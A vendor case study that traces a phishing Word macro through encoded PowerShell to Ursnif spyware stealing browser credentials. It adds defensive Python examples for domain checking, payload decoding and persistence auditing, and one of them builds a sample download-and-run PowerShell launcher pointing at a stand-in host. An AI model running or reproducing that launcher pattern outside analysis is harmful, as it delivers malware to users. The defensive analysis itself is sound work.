Case Study

Advanced Attack Analysis.

Uri Ahronovich, Cyber Security Engineer
June 29, 2018

Perception Point’s platform recently caught an advanced threat directed at one of our customers within a Microsoft Word file. Our Incident Analysis report below provides a detailed understanding of the attack and the damage it could have caused.

Key observations regarding this attack:

Overview.

One of our customers received an email that had been flagged “malicious” by Perception Point’s platform. This report includes a “what-if” analysis that examines the potential effect of the attack had the malicious file not been blocked.

STAGE ONE

Header Analysis.

  1. In order to gain the recipient’s trust, the attacker sent the email from an account resembling that of an executive the recipient regularly does business with. The domain name was identical except for the extension: “domain.net” instead of “domain.com”. “domain.net” was not found to be a known mail server.

  2. Perception Point’s platform:

    1. Our platform detected the malicious content and flagged the email as “malicious”, due to an attachment that contained a .doc file.
    2. The MD5 of the file is: fdd7f9367f976ceb07279648f373a93b
    3. Perception Point’s team uploaded the file to VirusTotal, since it had not yet been flagged there as malicious.
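The look-alike domain described in step 1 can be checked mechanically against a list of known correspondents. The following is an added example (not Perception Point's code); the partner allow-list is constructed and reuses the page's “domain.com” / “domain.net” pair, and the suffix handling assumes single-label TLDs.

```python
"""Lookalike sender-domain check for the Stage One header finding.
Added example, not Perception Point's code; the partner allow-list is
constructed and reuses the page's "domain.com" / "domain.net" pair."""

# Constructed allow-list of domains the customer regularly exchanges mail with.
TRUSTED_PARTNER_DOMAINS = frozenset({"domain.com"})


def registrable_label(domain: str) -> str:
    """Label just left of the public suffix. Assumes single-label suffixes
    (.com, .net); a real deployment would consult the Public Suffix List."""
    parts = domain.lower().strip().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def sender_domain(address: str) -> str:
    """Domain part of an RFC 5322-style address, lower-cased."""
    return address.rsplit("@", 1)[-1].strip(" >").lower()


def classify_sender(address: str, trusted=TRUSTED_PARTNER_DOMAINS) -> dict:
    """Return a verdict plus the trusted domain being imitated, if any.

    'lookalike_tld_swap' is the page's case: the same registrable label as a
    partner domain but a different suffix (domain.net instead of domain.com).
    A live MX lookup (the page's "not a known mail server" check) is out of
    scope here so the example runs offline."""
    domain = sender_domain(address)
    if domain in trusted:
        return {"verdict": "trusted", "imitates": None}
    label = registrable_label(domain)
    for partner in sorted(trusted):
        if domain.endswith("." + partner):
            return {"verdict": "trusted_subdomain", "imitates": None}
        if registrable_label(partner) == label:
            return {"verdict": "lookalike_tld_swap", "imitates": partner}
    return {"verdict": "unknown", "imitates": None}
```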


STAGE TWO

Attachment Analysis.

Perception Point’s engines identified the malicious activity by tracking down macro commands. We noticed the following anomalies: the macro is obfuscated, and the code is far longer than any legitimate purpose would require.
The command lines as extracted by Perception Point’s platform

STAGE THREE

Dynamic Analysis of the Attachment.

  1. Running the Word .doc file in a contained environment shows that the macro runs an encoded PowerShell command.

  2. The PowerShell command is base64 encoded.

  3. Once the first layer is decoded, the resulting payload is as follows:

  4. For the purpose of this analysis, we removed the last command, “invoke-expression”, to prevent any actual malicious activity, and then ran the command:

  5. The PowerShell script downloads an .exe file from hxxp://zzajqwnewq.com/GGKO/chibura.php?l=anz9.yarn, renames it with a random name, saves it in a temp folder, and then executes it.
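The layer-by-layer decoding in steps 2 to 4 can be turned into a reusable check. The following is an added example (not Perception Point's code): it assumes the launcher passes its script via -EncodedCommand and nests further base64 in FromBase64String('...') literals, and the sample command line is constructed here and points at a reserved .invalid host.

```python
"""Decode a -EncodedCommand launcher layer by layer and flag downloader traits.
Added example for Stage Three, not Perception Point's code; the sample command
line is constructed here and points at a reserved .invalid host."""
import base64
import re
# Behaviours the page's payload shows: download, random name, temp folder, run.
INDICATORS = {
    "downloads_file": r"DownloadFile|DownloadString|Invoke-WebRequest",
    "random_name": r"Get-Random|GetRandomFileName",
    "temp_folder": r"\$env:TEMP|GetTempPath",
    "executes": r"Start-Process|Invoke-Expression|\biex\b",
}
_ENC_FLAG = re.compile(r"^-(?:e|ec|enc|encodedcommand)$", re.I)
_NESTED = re.compile(r"FromBase64String\(\s*'([A-Za-z0-9+/=]+)'\s*\)")


def decode_layers(cmdline: str) -> list:
    """Layer 0 is the UTF-16LE -EncodedCommand body; later layers are nested base64 literals."""
    argv = cmdline.split()
    layers = [base64.b64decode(argv[i + 1]).decode("utf-16-le")
              for i, tok in enumerate(argv[:-1]) if _ENC_FLAG.match(tok)][:1]
    i = 0
    while i < len(layers):
        for blob in _NESTED.findall(layers[i]):
            raw = base64.b64decode(blob)  # inner blobs are usually UTF-8
            layers.append(raw.decode("utf-16-le") if b"\x00" in raw else raw.decode())
        i += 1
    return layers


def analyse(cmdline: str) -> dict:
    """Run the indicator regexes over every decoded layer and give a verdict."""
    layers = decode_layers(cmdline)
    text = "\n".join(layers)
    hits = sorted(k for k, pat in INDICATORS.items() if re.search(pat, text, re.I))
    verdict = "downloader" if {"downloads_file", "executes"} <= set(hits) else "unknown"
    return {"layers": len(layers), "indicators": hits, "verdict": verdict}


def build_sample() -> str:
    """Constructed two-layer launcher shaped like the one the page describes."""
    inner = ("$p=Join-Path $env:TEMP ((Get-Random).ToString()+'.exe');"
             "(New-Object Net.WebClient).DownloadFile('http://sample.invalid/x',$p);"
             "Start-Process $p")
    inner_b64 = base64.b64encode(inner.encode()).decode()
    outer = f"iex([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('{inner_b64}')))"
    outer_b64 = base64.b64encode(outer.encode("utf-16-le")).decode()
    return f"powershell.exe -NoP -W Hidden -EncodedCommand {outer_b64}"
```

Running analyse(build_sample()) reports two decoded layers and all four indicators; a command line without -EncodedCommand yields no layers and the verdict "unknown".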


STAGE FOUR

Executable File Analysis.

  1. The downloaded executable was identified as “Spyware” on VirusTotal (file hash: 5eb5a460b9a8ce8c00b54e53e14eec78):

  2. The file is classified as TrojanSpy:Win32/Ursnif. TrojanSpy:Win32/Ursnif is a generic malware family with capabilities such as keylogging*, data theft and command-and-control (C&C) communication.
    *) A “keylogger” (short for “keystroke logger”) is software that tracks or logs the keys struck on a keyboard, typically covertly, so that the user does not know their actions are being monitored. This is usually done with malicious intent, to collect the user’s account information, credit card numbers, usernames, passwords and other private data.
  3. TrojanSpy:Win32/Ursnif has been around since November 20, 2010, but this specific sample was submitted to VT on June 12, 2018:

  4. Persistence techniques:
    1. The executable copies itself to the Administrator/AppData/Roaming/Microsoft/Dfdtents folder. This folder is hidden by default by Windows file-system settings, so it is invisible to the user.

    2. It creates a registry key for persistence.
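The persistence pair in step 4 (a copy under a hidden roaming-AppData folder plus a Run-key entry) is something an endpoint audit can look for. The following is an added example (not Perception Point's code); the registry values are constructed stand-ins that reuse the Dfdtents folder name from the page with a made-up file name, and the hidden-folder set replaces a live attribute check so the code runs offline.

```python
"""Audit Run-key persistence entries for the Stage Four pattern: a program
launched from a hidden folder under the user's roaming AppData.
Added example, not Perception Point's code; the registry values and the
hidden-folder set are constructed stand-ins, not data from the sample."""
import ntpath
import re

# Constructed HKCU\...\CurrentVersion\Run values: (value name, command data).
# The Dfdtents path mirrors the folder named on the page; the file name is made up.
RUN_VALUES = [
    ("OneDrive", r'"C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("Dfdtents", r"C:\Users\Administrator\AppData\Roaming\Microsoft\Dfdtents\constructed_name.exe"),
    ("Defender", r'"C:\Program Files\Windows Defender\MSASCuiL.exe"'),
]
# Stand-in for a live FILE_ATTRIBUTE_HIDDEN check so the example runs offline.
HIDDEN_DIRS = frozenset({r"C:\Users\Administrator\AppData\Roaming\Microsoft\Dfdtents"})


def executable_path(command: str) -> str:
    """Program path from Run-key command data, whether quoted or bare."""
    m = re.match(r'\s*"([^"]+)"|\s*(\S+)', command)
    return (m.group(1) or m.group(2)) if m else ""


def suspicious_reasons(command: str, hidden_dirs=HIDDEN_DIRS) -> list:
    """Reasons a Run entry matches the page's persistence pattern (empty if none)."""
    path = executable_path(command)
    directory = ntpath.dirname(path)
    reasons = []
    if re.search(r"\\AppData\\Roaming\\|%APPDATA%", path, re.I):
        reasons.append("target_in_roaming_appdata")
    if directory.lower() in {d.lower() for d in hidden_dirs}:
        reasons.append("target_dir_hidden")
    return reasons


def audit(values=RUN_VALUES, hidden_dirs=HIDDEN_DIRS) -> dict:
    """Map each flagged value name to its reasons; clean entries are omitted."""
    findings = {}
    for name, command in values:
        reasons = suspicious_reasons(command, hidden_dirs)
        if reasons:
            findings[name] = reasons
    return findings
```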


STAGE FIVE

Data Collection.

  1. The malware collects data, such as usernames and passwords from browsers, and saves it in a hidden folder.
  2. In order to test the malware, we simulated a login activity to a Gmail account. As can be seen in the screenshot below, the malware had stolen the username and the matching password.

Summary.

This attack could have been very damaging for our customer, as it was well-disguised and very effective once released. Learn more about how our hardware-assisted platform is able to catch such attacks here:

Our Technology